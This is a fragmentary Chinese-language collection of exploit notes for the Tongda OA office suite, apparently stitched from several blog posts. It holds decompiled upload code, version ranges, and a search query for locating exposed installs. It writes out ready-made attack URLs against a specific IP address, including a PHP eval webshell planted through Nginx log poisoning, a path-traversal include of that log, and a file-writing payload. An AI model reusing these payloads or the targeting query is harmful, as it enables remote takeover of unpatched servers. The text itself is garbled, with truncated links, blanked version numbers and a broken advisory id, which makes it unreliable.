通达OA
1:未授权文件上传 + 文件包含姿势2:Nginx日志 + 文件包含CNVD:CNVD--2656211.5 sql注入漏洞复现 11.x<11.5任意用户未授权通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统
采用基于WEB的企业计算,
主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。
数据存取集中控制,避免了数据泄漏的可能。
提供数据备份工具,保护系统数据安全。
多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。
自主研发的协同办公自动化软件,
是与中国企业管理实践相结合形成的综合管理办公平台
,通达云OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑
通达OA可供用户免费下载使用,安装简单,默认安装了Nginx、mysql等服务,
系统默认由System权限启动
360安全大脑-Quake网络空间测绘系统通过对全网资产测绘
1:未授权文件上传 + 文件包含姿势
2:Nginx日志 + 文件包含
/content/20/0405/19/64353657_904057447.shtml
58.56.254.122:8081/<?php@eval($_POST['aming']);?>
http://58.56.254.122:8081/ispirit/interface/gateway.php?json={}&url=…/…/ispirit/…/…/nginx/logs/oa.access.log
http://cn-/archives/498043.html
http://58.56.254.122:8081/ispirit/interface/gateway.php?json={}&aa=<?php file_put_contents('1.php','hello world');?>
通达OA,V11.X<V11.5
通达oa远程命令执行:影响的版本有:V11版,版,版,版,增强版,版。
app=“通达OA” body=" static/images/tongda.ico"
.cn/
/szgyunyun/article/details/107104288
/blue_fantasy/article/details/122403451
/weixin_44831109/article/details/123841373
/qq_29443517/article/details/106275093
CNVD:CNVD--26562
未授权的情况下可上传图片木马文件
精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击
影响范围
通达OA V11版 <= 11.3 0103
通达OA 版 <= 10.19 0522
通达OA 版 <= 9.13 0710
通达OA 版 <= 8.15 0722
通达OA 增强版 <= 7.25 1211
通达OA 版 <= 6.20 1017
V11版 版 版 版 增强版版
未授权上传文件
\ispirit\im\upload.php
<?phpset_time_limit(0);$P = $_POST['P'];if (isset($P) || $P != '') {ob_start();include_once 'inc/session.php';session_id($P);session_start();session_write_close();} else {include_once './auth.php';}include_once 'inc/utility_file.php';include_once 'inc/utility_msg.php';include_once 'mobile/inc/funcs.php';ob_end_clean();$TYPE = $_POST['TYPE'];$DEST_UID = $_POST['DEST_UID'];$dataBack = array();if ($DEST_UID != '' && !td_verify_ids($ids)) {$dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));echo json_encode(data2utf8($dataBack));exit;}if (strpos($DEST_UID, ',') !== false) {} else {$DEST_UID = intval($DEST_UID);}if ($DEST_UID == 0) {if ($UPLOAD_MODE != 2) {$dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));echo json_encode(data2utf8($dataBack));exit;}}$MODULE = 'im';if (1 <= count($_FILES)) {if ($UPLOAD_MODE == '1') {if (strlen(urldecode($_FILES['ATTACHMENT']['name'])) != strlen($_FILES['ATTACHMENT']['name'])) {$_FILES['ATTACHMENT']['name'] = urldecode($_FILES['ATTACHMENT']['name']);}}$ATTACHMENTS = upload('ATTACHMENT', $MODULE, false);if (!is_array($ATTACHMENTS)) {$dataBack = array('status' => 0, 'content' => '-ERR ' . $ATTACHMENTS);echo json_encode(data2utf8($dataBack));exit;}ob_end_clean();$ATTACHMENT_ID = substr($ATTACHMENTS['ID'], 0, -1);$ATTACHMENT_NAME = substr($ATTACHMENTS['NAME'], 0, -1);if ($TYPE == 'mobile') {$ATTACHMENT_NAME = td_iconv(urldecode($ATTACHMENT_NAME), 'utf-8', MYOA_CHARSET);}} else {$dataBack = array('status' => 0, 'content' => '-ERR ' . _('无文件上传'));echo json_encode(data2utf8($dataBack));exit;}$FILE_SIZE = attach_size($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);if (!$FILE_SIZE) {$dataBack = array('status' => 0, 'content' => '-ERR ' . _('文件上传失败'));echo json_encode(data2utf8($dataBack));exit;}if ($UPLOAD_MODE == '1') {if (is_thumbable($ATTACHMENT_NAME)) {$FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);$THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . 'thumb_' . $ATTACHMENT_NAME;CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);}$P_VER = is_numeric($P_VER) ? intval($P_VER) : 0;$MSG_CATE = $_POST['MSG_CATE'];if ($MSG_CATE == 'file') {$CONTENT = '[fm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/fm]';} else {if ($MSG_CATE == 'image') {$CONTENT = '[im]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/im]';} else {$DURATION = intval($DURATION);$CONTENT = '[vm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $DURATION . '[/vm]';}}$AID = 0;$POS = strpos($ATTACHMENT_ID, '@');if ($POS !== false) {$AID = intval(substr($ATTACHMENT_ID, 0, $POS));}$query = 'INSERT INTO im_offline_file (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG,AID) values (\'' . date('Y-m-d H:i:s') . '\',\'' . $_SESSION['LOGIN_UID'] . '\',\'' . $DEST_UID . '\',\'*' . $ATTACHMENT_ID . '.' . $ATTACHMENT_NAME . '\',\'' . $FILE_SIZE . '\',\'0\',\'' . $AID . '\')';$cursor = exequery(TD::conn(), $query);$FILE_ID = mysql_insert_id();if ($cursor === false) {$dataBack = array('status' => 0, 'content' => '-ERR ' . _('数据库操作失败'));echo json_encode(data2utf8($dataBack));exit;}$dataBack = array('status' => 1, 'content' => $CONTENT, 'file_id' => $FILE_ID);echo json_encode(data2utf8($dataBack));exit;} else {if ($UPLOAD_MODE == '2') {$DURATION = intval($_POST['DURATION']);$CONTENT = '[vm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $DURATION . '[/vm]';$query = 'INSERT INTO WEIXUN_SHARE (UID, CONTENT, ADDTIME) VALUES (\'' . $_SESSION['LOGIN_UID'] . '\', \'' . $CONTENT . '\', \'' . time() . '\')';$cursor = exequery(TD::conn(), $query);echo '+OK ' . $CONTENT;} else {if ($UPLOAD_MODE == '3') {if (is_thumbable($ATTACHMENT_NAME)) {$FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);$THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . 'thumb_' . $ATTACHMENT_NAME;CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);}echo '+OK ' . $ATTACHMENT_ID;} else {$CONTENT = '[fm]' . $ATTACHMENT_ID . '|' . $ATTACHMENT_NAME . '|' . $FILE_SIZE . '[/fm]';$msg_id = send_msg($_SESSION['LOGIN_UID'], $DEST_UID, 1, $CONTENT, '', 2);$query = 'insert into IM_OFFLINE_FILE (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG) values (\'' . date('Y-m-d H:i:s') . '\',\'' . $_SESSION['LOGIN_UID'] . '\',\'' . $DEST_UID . '\',\'*' . $ATTACHMENT_ID . '.' . $ATTACHMENT_NAME . '\',\'' . $FILE_SIZE . '\',\'0\')';$cursor = exequery(TD::conn(), $query);$FILE_ID = mysql_insert_id();if ($cursor === false) {echo '-ERR ' . _('数据库操作失败');exit;}if ($FILE_ID == 0) {echo '-ERR ' . _('数据库操作失败2');exit;}echo '+OK ,' . $FILE_ID . ',' . $msg_id;exit;}}}
源码采用了zend加密,解密后才能正常阅读代码
第一个if(第5行)对P进行了判断,只要传递了参数P或者不为空,就可以进入下面的语句,
如果判断失败,就进入else,也就是身份认证功能
function upload($PREFIX = 'ATTACHMENT', $MODULE = '', $OUTPUT = true){if (strstr($MODULE, '/') || strstr($MODULE, '\\')) {if (!$OUTPUT) {return _('参数含有非法字符。');}Message(_('错误'), _('参数含有非法字符。'));exit;}$ATTACHMENTS = array('ID' => '', 'NAME' => '');reset($_FILES);foreach ($_FILES as $KEY => $ATTACHMENT) {if ($ATTACHMENT['error'] == 4 || $KEY != $PREFIX && substr($KEY, 0, strlen($PREFIX) + 1) != $PREFIX . '_') {continue;}$data_charset = isset($_GET['data_charset']) ?$_GET['data_charset'] : (isset($_POST['data_charset'])?$_POST['data_charset'] : '');$ATTACH_NAME = $data_charset != ''? td_iconv($ATTACHMENT['name'], $data_charset, MYOA_CHARSET) : $ATTACHMENT['name'];$ATTACH_SIZE = $ATTACHMENT['size'];$ATTACH_ERROR = $ATTACHMENT['error'];$ATTACH_FILE = $ATTACHMENT['tmp_name'];$ERROR_DESC = '';if ($ATTACH_ERROR == UPLOAD_ERR_OK) {if (!is_uploadable($ATTACH_NAME)) {$ERROR_DESC = sprintf(_('禁止上传后缀名为[%s]的文件'), substr($ATTACH_NAME, strrpos($ATTACH_NAME, '.') + 1));}$encode = mb_detect_encoding($ATTACH_NAME, array('ASCII', 'UTF-8', 'GB2312', 'GBK', 'BIG5'));if ($encode != 'UTF-8') {$ATTACH_NAME_UTF8 = mb_convert_encoding($ATTACH_NAME, 'utf-8', MYOA_CHARSET);} else {$ATTACH_NAME_UTF8 = $ATTACH_NAME;}if (preg_match('/[\\\':<>?]|\\/|\\\\|"|\\|/u', $ATTACH_NAME_UTF8)) {$ERROR_DESC = sprintf(_('文件名[%s]包含[/\\\'":*?<>|]等非法字符'), $ATTACH_NAME);}if ($ATTACH_SIZE == 0) {$ERROR_DESC = sprintf(_('文件[%s]大小为0字节'), $ATTACH_NAME);}if ($ERROR_DESC == '') {$ATTACH_NAME = str_replace('\'', '', $ATTACH_NAME);$ATTACH_ID = add_attach($ATTACH_FILE, $ATTACH_NAME, $MODULE);if ($ATTACH_ID === false) {$ERROR_DESC = sprintf(_('文件[%s]上传失败'), $ATTACH_NAME);} else {$ATTACHMENTS['ID'] .= $ATTACH_ID . ',';$ATTACHMENTS['NAME'] .= $ATTACH_NAME . '*';}}@unlink($ATTACH_FILE);} else {if ($ATTACH_ERROR == UPLOAD_ERR_INI_SIZE) {$ERROR_DESC = sprintf(_('文件[%s]的大小超过了系统限制(%s)'), $ATTACH_NAME, ini_get('upload_max_filesize'));} else {if ($ATTACH_ERROR == UPLOAD_ERR_FORM_SIZE) {$ERROR_DESC = sprintf(_('文件[%s]的大小超过了表单限制'), $ATTACH_NAME);} else {if ($ATTACH_ERROR == UPLOAD_ERR_PARTIAL) {$ERROR_DESC = sprintf(_('文件[%s]上传不完整'), $ATTACH_NAME);} else {if ($ATTACH_ERROR == UPLOAD_ERR_NO_TMP_DIR) {$ERROR_DESC = sprintf(_('文件[%s]上传失败:找不到临时文件夹'), $ATTACH_NAME);} else {if ($ATTACH_ERROR == UPLOAD_ERR_CANT_WRITE) {$ERROR_DESC = sprintf(_('文件[%s]写入失败'), $ATTACH_NAME);} else {$ERROR_DESC = sprintf(_('未知错误[代码:%s]'), $ATTACH_ERROR);}}}}}}if ($ERROR_DESC != '') {if (!$OUTPUT) {delete_attach($ATTACHMENTS['ID'], $ATTACHMENTS['NAME'], $MODULE);return $ERROR_DESC;} else {Message(_('错误'), $ERROR_DESC);}}}return $ATTACHMENTS;}
/weixin_45728976/article/details/105166034
/hackzkaq/article/details/115900500
11.5 sql注入漏洞复现
前提登录
/tags/MtTaEgwsMTU3NzMzLWJsb2cO0O0O.html
11.x<11.5任意用户未授权
/qq_45290991/article/details/12257
